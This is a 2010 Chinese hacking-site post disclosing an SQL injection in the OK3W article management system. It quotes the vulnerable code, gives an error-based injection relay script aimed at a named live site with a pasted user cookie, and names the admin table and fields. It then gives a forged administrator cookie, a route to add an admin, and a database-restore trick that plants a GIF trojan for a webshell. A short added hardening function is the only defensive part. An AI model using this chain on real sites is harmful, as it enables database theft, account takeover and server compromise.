OK3W article management system 0day vulnerability warning - the black bar safety net

ID MYHACK58:62201026923
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2010-05-14T00:00:00


OK3W is an article management system whose whole program structure is built on a custom class, which is quite creative o(∩_∩)o... Its security is fairly good. The current free version 4.7 has this vulnerability, and the official site may have it too, but I do not know of a patch yet. Last time I passed by I found the back-end verification routine:

Public Function AdminIsLogin()
    If Trim(AdminName) = "" Then
        AdminIsLogin = 0            ' not logged in
    Else
        If AdminLogin(AdminName, AdminPwd, "IsCheck") <> -1 Then
            AdminIsLogin = 0        ' cookie error
        Else
            AdminIsLogin = -1       ' logged in
        End If
    End If
End Function

Public Function AdminLogin(sAdminName, sAdminPwd, sType)
    AdminName = sAdminName
    Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?"
    Set AdminCmd = Server.CreateObject("Adodb.Command")
    AdminCmd.ActiveConnection = Conn
    AdminCmd.CommandType = 1        ' adCmdText
    AdminCmd.CommandText = Sql
    ' 200 = adVarChar, 1 = adParamInput, size 50
    AdminCmd.Parameters.Append AdminCmd.CreateParameter("@AdminName", 200, 1, 50, sAdminName)
    AdminCmd.Parameters.Append AdminCmd.CreateParameter("@AdminPwd", 200, 1, 50, sAdminPwd)
    Set AdminRs = Server.CreateObject("Adodb.RecordSet")
    Set AdminRs = AdminCmd.Execute
    ' debug output left in the pasted source, commented out here
    'Response.Write sAdminName & " " & sAdminPwd & " with"
    'Response.Write AdminCmd.CommandText
    Set AdminCmd = Nothing
    If AdminRs.Eof And AdminRs.Bof Then
        AdminLogin = 1              ' wrong user name or password
    Else
        If AdminRs("AdminLock") Then
            AdminLogin = 2          ' user is locked
        Else
            Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId")
            Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName")
            Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd")
            Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId")
            If sType = "IsLogin" Then Call AdminActionLog("successful login")
            AdminLogin = -1         ' successful login
        End If
    End If
    AdminRs.Close
    Set AdminRs = Nothing
    'Response.Write AdminLogin     ' debug output, commented out here
End Function

Finding a way in here is really laborious. The login check passes through this gateway: although it authenticates with cookies, the SQL statement is executed as a precompiled (parameterized) query, so a single quote is useless here and a universal password cannot be used. (Thanks to ninty for pointing this out.)

So we can only inject to get the password. Looking at the way it is encrypted: a 32-character MD5 is taken, then characters 1 to 6 (and the following groups in turn) are each hashed again with 16-character MD5 and the results merged; either way it cannot be reversed. We can only obtain the password ciphertext and the user name and spoof the cookies. Vulnerable file: user_index.asp, which calls the article class. The following piece of code:

Private Sub GetFormData()
    Id = Request.QueryString("Id")
    If Id = "" Then Id = GetMaxArticleID() + 1
    ChannelID = Request.QueryString("ChannelID")
    ClassID = Request.Form("ClassID")
    If ClassID = "" Then
        ClassID = -1
        SortPath = ""
    Else
        ' ClassID is concatenated into the SQL with no filtering
        SortPath = Conn.Execute("select SortPath from Ok3w_Class where ID=" & ClassID)(0)
    End If
    Title = Request.Form("Title")
    TitleColor = Request.Form("TitleColor")
    TitleURL = Request.Form("TitleURL")
    Keywords = Request.Form("Keywords")
    Description = Request.Form("Description")
    For i = 1 To Request.Form("Content").Count
        Content = Content & Request.Form("Content")(i)
    Next
    If Request.Form("eWebEditorUpFile") = "1" Then
        ePATH_INFO = Request.ServerVariables("PATH_INFO")
        eTmp = Split(ePATH_INFO, "/")
        ePATH_INFO = ""
        For ee = 0 To UBound(eTmp) - 2
            ePATH_INFO = ePATH_INFO + eTmp(ee) + "/"
        Next
        Content = Replace(Content, "../upfiles/", "upfiles/")
        Content = Replace(Content, "../editor/", "editor/")
        Content = Replace(Content, ePATH_INFO & "upfiles/", "upfiles/")
        Content = Replace(Content, ePATH_INFO & "editor/", "editor/")
    End If
    Author = Request.Form("Author")
    ComeFrom = Request.Form("ComeFrom")
    AddTime = Request.Form("AddTime")
    Inputer = Request.Form("Inputer")
    If Inputer = "" Then Inputer = Admin.AdminName
    IsPass = Request.Form("IsPass")
    If IsPass = "" Then IsPass = 0
    IsPic = Request.Form("IsPic")
    If IsPic = "" Then IsPic = 0
    PicFile = Request.Form("PicFile")
    IsTop = Request.Form("IsTop")
    If IsTop = "" Then IsTop = 0
    IsCommend = Request.Form("IsCommend")
    If IsCommend = "" Then IsCommend = 0
    IsDelete = Request.Form("IsDelete")
    If IsDelete = "" Then IsDelete = 0
    IsMove = Request.Form("IsMove")
    If IsMove = "" Then IsMove = 0
    IsPlay = Request.Form("IsPlay")
    If IsPlay = "" Then IsPlay = 0
    IsIndexImg = Request.Form("IsIndexImg")
    If IsIndexImg = "" Then IsIndexImg = 0
    IsUserAdd = Request.Form("IsUserAdd")
    If IsUserAdd = "" Then IsUserAdd = 0
    GiveJifen = Request.Form("GiveJifen")
    If GiveJifen = "" Then GiveJifen = 0
    vUserGroupID = Request.Form("vUserGroupID")
    If vUserGroupID = "" Then vUserGroupID = 0
    vUserMore = Request.Form("vUserMore")
    If vUserMore = "" Then vUserMore = 0
    vUserJifen = Request.Form("vUserJifen")
    If vUserJifen = "" Then vUserJifen = 0
    pMoodStr = Request.Form("pMoodStr")
    If pMoodStr = "" Then pMoodStr = "0,0,0,0,0,0,0,0"
    Hits = Request.Form("Hits")
End Sub

But I did not know which file calls this, or whether ClassID is cast with CInt somewhere along the way, so I experimented and found that:

id=1 and 1=1  ->  error: type mismatch
id=1 and 1=2  ->  error: unable to find a result set

Injection is only possible through the error messages, that is, each injected request has to produce an error; if the server suppresses error information, it cannot be injected.
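As an added example (not OK3W's own code), this is how the ClassID lookup in GetFormData could be hardened so that both weaknesses the experiment above relies on disappear: the value is validated as an integer and bound through the same ADODB.Command parameter pattern that AdminLogin already uses, so the request value never becomes part of the SQL text and no type-mismatch or empty-result error reaches the browser. It assumes Conn is the page's open ADODB.Connection; LookupSortPath is a hypothetical name chosen for this example.

```vbscript
' Hardened replacement for the ClassID lookup in GetFormData (added example,
' not OK3W's own code). Assumes Conn is the page's open ADODB.Connection.
' LookupSortPath is a hypothetical name chosen for this example.
Private Function LookupSortPath(ByVal rawClassID)
    Dim lngID, cmd, rs
    LookupSortPath = ""                 ' default: no class selected

    ' 1. Accept only a plain integer. CLng raises a type-mismatch error on
    '    input such as "1 and 1=1", so catch it locally instead of letting
    '    the ASP error page act as an injection oracle.
    On Error Resume Next
    lngID = CLng(Trim(rawClassID))
    If Err.Number <> 0 Then
        Err.Clear
        On Error GoTo 0
        Exit Function
    End If
    On Error GoTo 0
    If lngID <= 0 Then Exit Function    ' the page uses -1 for "none"

    ' 2. Bind the value as a typed parameter (adInteger = 3,
    '    adParamInput = 1), the same ADODB.Command pattern AdminLogin
    '    uses, so the request value is never concatenated into the SQL.
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = Conn
    cmd.CommandType = 1                 ' adCmdText
    cmd.CommandText = "select SortPath from Ok3w_Class where ID=?"
    cmd.Parameters.Append cmd.CreateParameter("@ID", 3, 1, , lngID)
    Set rs = cmd.Execute

    ' 3. An empty recordset is a normal "unknown class" result, not an
    '    error, so the "unable to find a result set" message goes away too.
    If Not (rs.EOF And rs.BOF) Then LookupSortPath = rs(0)
    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
End Function

' Call site inside GetFormData, replacing the Conn.Execute(...)(0) line:
'   ClassID = Request.Form("ClassID")
'   SortPath = LookupSortPath(ClassID)
'   If SortPath = "" Then ClassID = -1
```

Disabling detailed ASP error messages to the browser in IIS closes the remaining error-based channel independently of the code fix.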

Injection process: register a user, log in, and get the cookies.

<%
JmdcwName = Request("jmdcw")    ' injection relay, POST version, by the lonely hedgehog [L.S.T]
JmStr = "Title=111&Content=111111&UpFiles=&ComeFrom=%CE%D2%B5%C4%CD%F8%D5%BE&Author=%CE%D2%B5%C4%CD%F8%D5%BE&ClassID=" & JmdcwName
JMUrl = "http://www.hackqing.cn/User_Index.asp?a=a_edit&b=save&a_id=28"    ' change localhost to the URL of the site
JmRef = "http://www.hackqing.cn/6kbbs/bank.asp"
JmCok = "Ok3w=User%5FPassword=ed64d3bd1ad013789c2e6ee373a96d8b&User%5FName=gogolrq"    ' put your own cookies here
JmCok = Replace(JmCok, Chr(32), "%20")
JmStr = URLEncoding(JmStr)
Response.Write PostData(JMUrl, JmStr, JmCok, JmRef)

Function PostData(PostUrl, PostStr, PostCok, PostRef)
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "POST", PostUrl, False
        .SetRequestHeader "Content-Length", Len(PostStr)
        .SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        .SetRequestHeader "Referer", PostRef
        .SetRequestHeader "Cookie", PostCok
        .Send PostStr
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Function URLEncoding(vstrin)
    strReturn = ""
    Dim i
    For i = 1 To Len(vstrin)
        ThisChr = Mid(vstrin, i, 1)
        If Abs(Asc(ThisChr)) < &HFF Then
            strReturn = strReturn & ThisChr
        Else
            InnerCode = Asc(ThisChr)
            If InnerCode < 0 Then
                InnerCode = InnerCode + &H10000
            End If
            Hight1 = (InnerCode And &HFF00) \ &HFF
            Low1 = InnerCode And &HFF
            strReturn = strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End If
    Next
    strReturn = Replace(strReturn, Chr(32), "%20")  ' convert spaces; if the site filters spaces, try /**/ instead of %20
    strReturn = Replace(strReturn, Chr(43), "%2B")  ' JMDCW: added conversion of the + character
    'strReturn = Replace(strReturn, "filtered character", "replacement character")  ' add conversions for filtered characters here
    URLEncoding = strReturn
End Function
%>

After modifying it, inject through the URL /jmdcw.asp?jmdcw=123 or 1=1

The table name is ok3w_admin, with fields adminname and adminpwd. After getting the account and password, forge the cookies:

Ok3w=AdminPwd=be4b3b08e33d66fc8b2759a05bf4e10e&AdminName=admin&GroupId=%2C1%2C2%2C3%2C4%2C5%2C6%2C&AdminId=16

Change adminpwd to the ciphertext you obtained and adminname to the corresponding user name. With the forged cookies, visit http://www.hackqing.cn/admin/sys_admin.asp and you can add a new administrator.

----------------------------------------------------------------------------------------------------------

Into the back end. The database is generally in asp format and cannot be downloaded as a table.

Upload vulnerability. Backup function: it can only back up the original database file; the path cannot be changed, and changing it is useless. Restore function: the restore path cannot be changed either (changing it is useless), but this is where you can get the database address. Use: first back up the original database, upload a gif trojan, then use the restore function to restore it to the database address, which is generally an asp file (if the database is not asp there is no chance), and you get the shell. At this point the website will be inaccessible; after getting in, please restore the database from the backup.